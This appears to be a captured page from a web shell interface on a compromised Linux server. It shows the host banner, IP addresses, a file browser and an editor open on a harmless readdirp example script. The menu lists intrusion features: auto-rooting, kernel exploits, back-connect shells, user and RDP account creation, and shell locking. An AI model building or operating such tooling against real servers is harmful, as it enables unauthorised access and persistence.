Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
node-readdirp /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
bench.js
731
B
-rw-r--r--
grep.js
1.46
KB
-rw-r--r--
list.js
733
B
-rw-r--r--
types.ts
578
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : list.js
/* eslint-disable no-unused-vars */ 'use strict'; const readdirp = require('..'); const read = async (directory) => { const stream = readdirp(directory, {type: 'all'}); let i = 0; const start = Date.now(); for await (const chunk of stream) { i++; // Check memory usage with this line. It should be 10MB or so. // Comment it out if you simply want to list files. // await new Promise(resolve => setTimeout(resolve, 500)); // if (i % 100000 === 0) // console.log(`${i}`, chunk); } console.log('finished', i, 'files in', Date.now() - start, 'ms'); // const entries = await readdirp.promise(directory, {alwaysStat: false}); // console.log('Promise done', entries.length); }; read('../..');
Close